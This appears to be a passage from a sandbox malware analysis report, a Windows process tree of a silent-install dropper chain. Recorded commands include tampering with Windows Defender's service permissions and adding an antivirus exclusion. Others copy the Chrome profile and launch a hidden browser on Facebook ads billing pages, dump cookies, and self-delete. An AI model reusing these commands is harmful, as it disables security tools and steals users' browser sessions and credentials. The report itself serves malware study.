sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
14⤵
PID:11280

C:\Users\Admin\AppData\Local\Temp\kyjaodyajks\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\kyjaodyajks\vpn.exe" /silent /subid=482
8⤵
PID:5252

C:\Users\Admin\AppData\Local\Temp\is-AUFPE.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AUFPE.tmp\vpn.tmp" /SL5="$1051A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\kyjaodyajks\vpn.exe" /silent /subid=482
9⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
10⤵
PID:4340

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
11⤵
PID:4820

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
10⤵
PID:4972

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
11⤵
PID:7144

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
10⤵
PID:7396

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
10⤵
PID:7544

C:\Users\Admin\AppData\Local\Temp\grgm51m50je\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\grgm51m50je\Setup3310.exe" /Verysilent /subid=577
8⤵
PID:7500

C:\Users\Admin\AppData\Local\Temp\is-78SDB.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-78SDB.tmp\Setup3310.tmp" /SL5="$8027C,802346,56832,C:\Users\Admin\AppData\Local\Temp\grgm51m50je\Setup3310.exe" /Verysilent /subid=577
9⤵
PID:7604

C:\Users\Admin\AppData\Local\Temp\is-APGME.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-APGME.tmp\Setup.exe" /Verysilent
10⤵
PID:12808

C:\Users\Admin\AppData\Local\Temp\is-JOFB1.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JOFB1.tmp\Setup.tmp" /SL5="$509CE,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-APGME.tmp\Setup.exe" /Verysilent
11⤵
PID:12912

C:\Users\Admin\AppData\Local\Temp\is-ERLHS.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-ERLHS.tmp\PictureLAb.exe" /Verysilent
12⤵
PID:17708

C:\Users\Admin\AppData\Local\Temp\is-34HHQ.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-34HHQ.tmp\PictureLAb.tmp" /SL5="$20A9C,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-ERLHS.tmp\PictureLAb.exe" /Verysilent
13⤵
PID:18292

C:\Users\Admin\AppData\Local\Temp\is-4TQIC.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-4TQIC.tmp\Setup.exe" /VERYSILENT
14⤵
PID:17220

C:\Users\Admin\AppData\Local\Temp\is-3TKAJ.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3TKAJ.tmp\Setup.tmp" /SL5="$407B4,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-4TQIC.tmp\Setup.exe" /VERYSILENT
15⤵
PID:15116

C:\Users\Admin\AppData\Local\Temp\is-NC4FL.tmp\def.exe
"C:\Users\Admin\AppData\Local\Temp\is-NC4FL.tmp\def.exe" /S /UID=lab214
16⤵
PID:17508

C:\Users\Admin\AppData\Local\Temp\be-4190b-a39-4f599-108d966ba8f88\Bushihaezhisi.exe
"C:\Users\Admin\AppData\Local\Temp\be-4190b-a39-4f599-108d966ba8f88\Bushihaezhisi.exe"
17⤵
PID:1424

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\05wy3fih.vha\askinstall18.exe & exit
18⤵
PID:11068

C:\Users\Admin\AppData\Local\Temp\05wy3fih.vha\askinstall18.exe
C:\Users\Admin\AppData\Local\Temp\05wy3fih.vha\askinstall18.exe
19⤵
PID:7024

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
20⤵
PID:11592

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
21⤵
- Kills process with taskkill
PID:356

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y
20⤵
PID:11832

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
20⤵
PID:18916

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x18cf48b6e00,0x18cf48b6e10,0x18cf48b6e20
21⤵
PID:5884

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1636,18301616427454431764,4161908210063348608,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1660 /prefetch:8
21⤵
PID:10752

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0zchbtlp.day\customer4.exe & exit
18⤵
PID:1300

C:\Users\Admin\AppData\Local\Temp\0zchbtlp.day\customer4.exe
C:\Users\Admin\AppData\Local\Temp\0zchbtlp.day\customer4.exe
19⤵
PID:12576

C:\Users\Admin\AppData\Local\Temp\RarSFX6\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX6\main.exe"
20⤵
PID:11132

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4ul1dogj.nri\md7_7dfj.exe & exit
18⤵
PID:13600

C:\Users\Admin\AppData\Local\Temp\4ul1dogj.nri\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\4ul1dogj.nri\md7_7dfj.exe
19⤵
PID:13140

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ky3vxf0d.hgf\GcleanerWW.exe /mixone & exit
18⤵
PID:9288

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2xg2fdxh.fgo\privacytools5.exe & exit
18⤵
PID:13580

C:\Users\Admin\AppData\Local\Temp\2xg2fdxh.fgo\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\2xg2fdxh.fgo\privacytools5.exe
19⤵
PID:10372

C:\Users\Admin\AppData\Local\Temp\2xg2fdxh.fgo\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\2xg2fdxh.fgo\privacytools5.exe
20⤵
PID:5772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1y1eiobm.nuz\setup.exe /8-2222 & exit
18⤵
PID:10908

C:\Users\Admin\AppData\Local\Temp\1y1eiobm.nuz\setup.exe
C:\Users\Admin\AppData\Local\Temp\1y1eiobm.nuz\setup.exe /8-2222
19⤵
PID:15136

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Autumn-Bush"
20⤵
PID:10404

C:\Program Files (x86)\Autumn-Bush\7za.exe
"C:\Program Files (x86)\Autumn-Bush\7za.exe" e -p154.61.71.51 winamp-plugins.7z
20⤵
PID:9748

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Autumn-Bush\setup.exe" -map "C:\Program Files (x86)\Autumn-Bush\WinmonProcessMonitor.sys""
20⤵
PID:17328

C:\Program Files (x86)\Autumn-Bush\setup.exe
"C:\Program Files (x86)\Autumn-Bush\setup.exe" -map "C:\Program Files (x86)\Autumn-Bush\WinmonProcessMonitor.sys"
21⤵
PID:10440

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aieapnwd.iy2\MultitimerFour.exe & exit
18⤵
PID:6028

C:\Users\Admin\AppData\Local\Temp\aieapnwd.iy2\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\aieapnwd.iy2\MultitimerFour.exe
19⤵
PID:15212

C:\Users\Admin\AppData\Local\Temp\UWLX5C1YBV\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\UWLX5C1YBV\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
20⤵
PID:10896

C:\Users\Admin\AppData\Local\Temp\UWLX5C1YBV\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\UWLX5C1YBV\multitimer.exe" 1 3.1615302429.60478f1d0e071 104
21⤵
PID:10020

C:\Users\Admin\AppData\Local\Temp\UWLX5C1YBV\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\UWLX5C1YBV\multitimer.exe" 2 3.1615302429.60478f1d0e071
22⤵
PID:10644

C:\Users\Admin\AppData\Local\Temp\tahlmzkn3p0\vict.exe
"C:\Users\Admin\AppData\Local\Temp\tahlmzkn3p0\vict.exe" /VERYSILENT /id=535
23⤵
PID:18404

C:\Users\Admin\AppData\Local\Temp\is-K2P8T.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-K2P8T.tmp\vict.tmp" /SL5="$30BDC,870426,780800,C:\Users\Admin\AppData\Local\Temp\tahlmzkn3p0\vict.exe" /VERYSILENT /id=535
24⤵
PID:8260

C:\Users\Admin\AppData\Local\Temp\is-J54IE.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-J54IE.tmp\wimapi.exe" 535
25⤵
PID:18752

C:\Users\Admin\AppData\Local\Temp\dpoodvbw5ca\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\dpoodvbw5ca\askinstall24.exe"
23⤵
PID:17796

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
24⤵
PID:20080

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
25⤵
- Kills process with taskkill
PID:7852

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y
24⤵
PID:1448

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
24⤵
PID:8732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x1ffbe376e00,0x1ffbe376e10,0x1ffbe376e20
25⤵
PID:7016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,17955880746772551570,11218124484997453192,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1716 /prefetch:8
25⤵
PID:5856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,17955880746772551570,11218124484997453192,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1668 /prefetch:2
25⤵
PID:17480

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,17955880746772551570,11218124484997453192,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2828 /prefetch:1
25⤵
PID:10936

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,17955880746772551570,11218124484997453192,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2820 /prefetch:1
25⤵
PID:11680

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1624,17955880746772551570,11218124484997453192,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2404 /prefetch:8
25⤵
PID:10036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,17955880746772551570,11218124484997453192,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2092 /prefetch:1
25⤵
PID:10172

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,17955880746772551570,11218124484997453192,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
25⤵
PID:13852

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,17955880746772551570,11218124484997453192,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:1
25⤵
PID:10272

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,17955880746772551570,11218124484997453192,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
25⤵
PID:12332

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,17955880746772551570,11218124484997453192,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4664 /prefetch:8
25⤵
PID:16588

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,17955880746772551570,11218124484997453192,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4824 /prefetch:8
25⤵
PID:15356

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,17955880746772551570,11218124484997453192,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1
25⤵
PID:8700

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,17955880746772551570,11218124484997453192,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
25⤵
PID:11040

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,17955880746772551570,11218124484997453192,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5816 /prefetch:8
25⤵
PID:14800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,17955880746772551570,11218124484997453192,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3904 /prefetch:1
25⤵
PID:8924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,17955880746772551570,11218124484997453192,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1376 /prefetch:1
25⤵
PID:15180

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,17955880746772551570,11218124484997453192,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=900 /prefetch:1
25⤵
PID:18224

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,17955880746772551570,11218124484997453192,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5356 /prefetch:8
25⤵
PID:13408

C:\Users\Admin\AppData\Local\Temp\1kask41mosc\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\1kask41mosc\chashepro3.exe" /VERYSILENT
23⤵
PID:17700

C:\Users\Admin\AppData\Local\Temp\is-FRJOH.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FRJOH.tmp\chashepro3.tmp" /SL5="$40938,1478410,58368,C:\Users\Admin\AppData\Local\Temp\1kask41mosc\chashepro3.exe" /VERYSILENT
24⤵
PID:3360

C:\Users\Admin\AppData\Local\Temp\eawhzacyqxk\dcbfsrze3la.exe
"C:\Users\Admin\AppData\Local\Temp\eawhzacyqxk\dcbfsrze3la.exe" /ustwo INSTALL
23⤵
PID:15236

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "dcbfsrze3la.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\eawhzacyqxk\dcbfsrze3la.exe" & exit
24⤵
PID:17276

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "dcbfsrze3la.exe" /f
25⤵
- Kills process with taskkill
PID:13384

C:\Users\Admin\AppData\Local\Temp\zbm2dxntaee\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\zbm2dxntaee\Setup3310.exe" /Verysilent /subid=577
23⤵
PID:20216

C:\Users\Admin\AppData\Local\Temp\is-EVNOA.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EVNOA.tmp\Setup3310.tmp" /SL5="$20C4A,802346,56832,C:\Users\Admin\AppData\Local\Temp\zbm2dxntaee\Setup3310.exe" /Verysilent /subid=577
24⤵
PID:14616

C:\Users\Admin\AppData\Local\Temp\is-SVHKN.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-SVHKN.tmp\Setup.exe" /Verysilent
25⤵
PID:8928

C:\Users\Admin\AppData\Local\Temp\is-PIEU6.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PIEU6.tmp\Setup.tmp" /SL5="$30D1C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-SVHKN.tmp\Setup.exe" /Verysilent
26⤵
PID:11152

C:\Users\Admin\AppData\Local\Temp\is-CSA39.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-CSA39.tmp\PictureLAb.exe" /Verysilent
27⤵
PID:12232

C:\Users\Admin\AppData\Local\Temp\is-9KMN9.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9KMN9.tmp\PictureLAb.tmp" /SL5="$20CAC,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-CSA39.tmp\PictureLAb.exe" /Verysilent
28⤵
PID:14292

C:\Users\Admin\AppData\Local\Temp\is-HCRHA.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-HCRHA.tmp\Setup.exe" /VERYSILENT
29⤵
PID:10024

C:\Users\Admin\AppData\Local\Temp\is-6DVVD.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6DVVD.tmp\Setup.tmp" /SL5="$50986,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-HCRHA.tmp\Setup.exe" /VERYSILENT
30⤵
PID:6364

C:\Users\Admin\AppData\Local\Temp\is-1AJE8.tmp\def.exe
"C:\Users\Admin\AppData\Local\Temp\is-1AJE8.tmp\def.exe" /S /UID=lab214
31⤵
PID:10976

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 1256
32⤵
PID:17968

C:\Users\Admin\AppData\Local\Temp\is-CSA39.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-CSA39.tmp\Delta.exe" /Verysilent
27⤵
PID:17124

C:\Users\Admin\AppData\Local\Temp\is-E7UIE.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-E7UIE.tmp\Delta.tmp" /SL5="$30CAA,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-CSA39.tmp\Delta.exe" /Verysilent
28⤵
PID:11892

C:\Users\Admin\AppData\Local\Temp\is-HLERM.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-HLERM.tmp\Setup.exe" /VERYSILENT
29⤵
PID:10412

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-HLERM.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
30⤵
PID:17052

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
31⤵
- Kills process with taskkill
PID:13820

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
31⤵
- Delays execution with timeout.exe
PID:13416

C:\Users\Admin\AppData\Local\Temp\is-CSA39.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-CSA39.tmp\zznote.exe" /Verysilent
27⤵
PID:20004

C:\Users\Admin\AppData\Local\Temp\is-Q03MG.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q03MG.tmp\zznote.tmp" /SL5="$50BD0,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-CSA39.tmp\zznote.exe" /Verysilent
28⤵
PID:11096

C:\Users\Admin\AppData\Local\Temp\is-V8G00.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-V8G00.tmp\jg4_4jaa.exe" /silent
29⤵
PID:13052

C:\Users\Admin\AppData\Local\Temp\is-CSA39.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-CSA39.tmp\hjjgaa.exe" /Verysilent
27⤵
PID:9648

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
28⤵
PID:11456

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
28⤵
PID:18856

C:\Users\Admin\AppData\Local\Temp\is-ERLHS.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-ERLHS.tmp\Delta.exe" /Verysilent
12⤵
PID:11164

C:\Users\Admin\AppData\Local\Temp\is-401KS.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-401KS.tmp\Delta.tmp" /SL5="$40A9C,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-ERLHS.tmp\Delta.exe" /Verysilent
13⤵
PID:7976

C:\Users\Admin\AppData\Local\Temp\is-VK8RT.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-VK8RT.tmp\Setup.exe" /VERYSILENT
14⤵
PID:18564

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-VK8RT.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
15⤵
PID:18804

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
16⤵
- Kills process with taskkill
PID:18332

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
16⤵
- Delays execution with timeout.exe
PID:7404

C:\Users\Admin\AppData\Local\Temp\is-ERLHS.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-ERLHS.tmp\zznote.exe" /Verysilent
12⤵
PID:12920

C:\Users\Admin\AppData\Local\Temp\is-8VPF8.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8VPF8.tmp\zznote.tmp" /SL5="$80A76,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-ERLHS.tmp\zznote.exe" /Verysilent
13⤵
PID:13076

C:\Users\Admin\AppData\Local\Temp\is-O8MRE.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-O8MRE.tmp\jg4_4jaa.exe" /silent
14⤵
PID:16816

C:\Users\Admin\AppData\Local\Temp\is-ERLHS.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-ERLHS.tmp\hjjgaa.exe" /Verysilent
12⤵
PID:19496

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:10360

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
